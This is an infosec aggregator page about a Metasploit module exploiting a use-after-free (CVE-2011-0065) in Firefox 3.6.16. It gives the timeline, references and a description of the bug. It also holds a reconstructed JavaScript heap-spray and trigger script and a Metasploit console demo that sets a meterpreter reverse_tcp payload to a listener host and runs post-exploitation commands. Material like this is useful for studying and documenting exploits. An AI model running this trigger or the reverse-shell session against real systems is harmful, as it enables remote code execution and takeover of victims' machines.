Timeline :
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to the vendor on 2011-02-17
Coordinated public release of the vulnerability on 2011-04-28
Metasploit PoC provided on 2011-08-10
PoC provided by:
regenrecht
Rh0
Reference(s) :
CVE-2011-0065
OSVDB-72085
MFSA2011-13
ZDI-11-158
Affected versions :
Mozilla Firefox prior to version 3.6.17
Mozilla Firefox prior to version 3.5.19
SeaMonkey before version 2.0.14
Tested on Windows XP SP3 with Mozilla Firefox 3.6.16
Description :
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. The mChannel member of an OBJECT element can be freed by calling the OnChannelRedirect method of the element's nsIChannelEventSink interface. The freed object is not cleared from the element, so mChannel is left as a dangling pointer, and it is used again when the OBJECT's data attribute is set. (Discovered by regenrecht.) The module uses a heap spray together with a minimal ROP chain to bypass DEP on Windows XP SP3.
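The sequence the description lays out, written as an added JavaScript example. This is not the Metasploit module's own code (which the page does not reproduce) and it carries no ROP chain or payload, so on an affected build it is at most a crash trigger, not a DEP bypass. Everything the page does not state is an assumption: the OBJECT element has id "d", the interface is reached through QueryInterface and Components.interfaces (as content scripts could do in Firefox 3.x), onChannelRedirect is called with (null, {}, 0), the spray fills blocks with the placeholder pointer 0x0c0c0c0c, and the spray is done after the free (the usual use-after-free reclaim order, not taken from the page). The document and Components objects are passed in as parameters so the same function can be exercised outside a browser.

```javascript
// Added example, not the module's code. Reconstructs the trigger described
// on this page. Assumptions: element id "d", QueryInterface/Components
// access, onChannelRedirect(null, {}, 0), placeholder pointer 0x0c0c0c0c,
// spray performed after the free. No ROP chain: crash trigger only.

// One spray block: a fake object whose first 4 bytes (what a read of the
// vtable pointer through the dangling mChannel would see) are fakeVtable,
// repeated to fill blockSize bytes. Gecko strings are UTF-16, so each char
// is 2 bytes and the low 16 bits go first to match x86 little-endian order.
function buildSprayBlock(fakeVtable, blockSize) {
  var lo = fakeVtable & 0xffff;
  var hi = (fakeVtable >>> 16) & 0xffff;
  var block = String.fromCharCode(lo, hi);
  while (block.length < blockSize / 2) {
    block += block;
  }
  return block.substring(0, blockSize / 2); // length in UTF-16 code units
}

// blockCount separate blocks. Each is built on its own rather than copied
// from one string so that every array element gets its own heap buffer.
function buildSpray(fakeVtable, blockSize, blockCount) {
  var spray = new Array(blockCount);
  for (var i = 0; i < blockCount; i++) {
    spray[i] = buildSprayBlock(fakeVtable, blockSize);
  }
  return spray;
}

// The trigger. In Firefox 3.6.16 doc is the page's document and Components
// is the XPCOM Components object; outside a browser stand-ins can be passed.
function triggerUaf(doc, Components, spray) {
  var obj = doc.getElementById("d"); // the OBJECT element (id assumed)
  // 1. Free: get the element's nsIChannelEventSink view and call
  //    OnChannelRedirect. The channel held in mChannel is released and
  //    freed, but the mChannel member still holds its old address.
  var sink = obj.QueryInterface(Components.interfaces.nsIChannelEventSink);
  sink.onChannelRedirect(null, {}, 0);
  // 2. Reclaim: allocate the spray after the free, so these are the
  //    allocations that can land where the channel object used to be.
  var kept = spray();
  // 3. Reuse: setting data makes the element go through the dangling
  //    mChannel again, now reading whatever occupies the freed memory.
  obj.data = "";
  return kept; // keep the spray reachable so it is not garbage collected
}

// Only runs inside the browser; in Node these globals do not exist.
if (typeof document !== "undefined" && typeof Components !== "undefined") {
  window.sprayKeepAlive = triggerUaf(document, Components, function () {
    return buildSpray(0x0c0c0c0c, 0x100000, 200); // 200 x 1 MiB (assumed sizes)
  });
}
```

To exercise it in the affected browser the script would sit in a page that contains an OBJECT element with id "d"; the spray sizes are the kind used against a 32-bit process of that era and would need adjusting for any real layout work.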
Metasploit demo :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
sysinfo
ipconfig
Tags: Mozilla, Firefox, Metasploit
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.